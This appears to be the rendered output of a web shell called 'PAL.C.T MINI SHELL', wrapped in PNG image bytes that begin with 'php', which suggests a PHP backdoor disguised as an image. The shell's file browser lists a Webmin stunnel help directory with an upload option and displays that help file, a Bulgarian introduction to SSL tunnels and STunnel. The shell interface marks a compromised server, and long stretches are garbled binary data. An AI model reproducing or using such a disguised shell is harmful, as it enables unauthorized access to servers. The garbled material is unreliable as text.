php  IHDRwQ)Ba pHYs  sRGBgAMA aIDATxMk\Us&uo,mD )Xw+e?tw.oWp;QHZnw`gaiJ9̟灙a=nl[ ʨG;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$ w@H;@ q$y H@E7j 1j+OFRg}ܫ;@Ea~ j`u'o> j-$_q?qSXzG'ay

PAL.C.T MINI SHELL
files >> /usr/libexec/webmin/stunnel/help/
upload
files >> //usr/libexec/webmin/stunnel/help/intro.bg.auto.html

<header> Въведение в тунелите SSL </header> SSL е протокол за криптиране на данни в TCP връзка, докато пътува по мрежата. Първоначално е разработен за защита на трафика между уеб браузъри и сървъри, но може да се използва за криптиране на всякакъв вид поток от данни, който обикновено се изпраща чрез протокола TCP. <p> Протоколът SSL позволява на клиентите и сървърите да се удостоверяват един с друг, така че клиентът да може да бъде сигурен, че наистина се свързва с хоста, който смята за такъв. Това става с помощта на сертификати, които се издават от сертифициран орган, разпознат от клиента (за да могат да бъдат проверени) и свързани с конкретно име на хост. Без сертификати атакуващият може да пренасочи SSL връзка към собствения си сървър и да заснеме чувствителна информация от клиент, който смята, че говори с реалния сървър. <p> Всички данни, които пътуват през Интернет без шифроване, могат да бъдат заснети и прочетени от нападател с достъп до една от мрежите, през които преминава. Дори данните, пътуващи между клиентска и сървърна система в локална мрежа, могат лесно да се слушат. Когато се свържете с telnet, FTP или POP3 сървър, вашата парола се изпраща по мрежата и по този начин може да бъде заловен от атакуващ. <p> SSL може да се използва за защита на данни в такива ситуации, но само ако и клиентът, и сървърът го поддържат. Повечето уеб браузъри и пощенски клиенти могат да осъществяват криптирани за SSL HTTP, POP3 и IMAP връзки, но не всички уеб и POP3 сървъри могат да ги приемат. По-специално POP3 е трудно да се защити, тъй като стандартният сървър, който се предлага с повечето Unix системи, изобщо не поддържа SSL. За щастие, въпреки че има решение - STunnel. <p> STunnel е проста програма, която преобразува незашифрована връзка в SSL-криптирана. Обикновено е настроен да се стартира от супер сървър като inetd или xinetd и след това да стартира някаква друга програма като POP3 сървъра, която не поддържа SSL. Този дизайн му позволява да защитава всеки сървър, който обикновено се изпълнява от inetd, като telnet, NNTP и IMAP сървъри. <p> Не всички сървъри обаче могат да бъдат полезно защитени с криптиране, тъй като няма клиент, който да ги използва в SSL режим. Например, никога не съм чувал за telnet или FTP клиент, който може да използва SSL, тъй като общият SSH пакет вече позволява криптирани отдалечени вход и прехвърляне на файлове. <p> Този модул Webmin улеснява настройването на супер сървърни услуги, които изпълняват STunnel, за да стартират някаква сървърна програма. Въпреки че това може да се извърши ръчно с помощта на модула Internet Services, този е специално създаден за настройка и конфигуриране на STunnel. Той автоматично открива дали сте инсталирали inetd и / или xinetd, чете техните конфигурации, за да провери за съществуващи тунели SSL и добавя към тях, когато създавате нов тунел. Ако и двете са инсталирани, към конфигурацията на xinetd се добавят нови SSL тунели, тъй като според мен тя е по-добра от двете. <p><hr>
y~or5J={Eeu磝QkᯘG{?+]ן?wM3X^歌>{7پK>on\jyR g/=fOroNVv~Y+NGuÝHWyw[eQʨSb>>}Gmx[o[<{Ϯ_qF vMIENDB`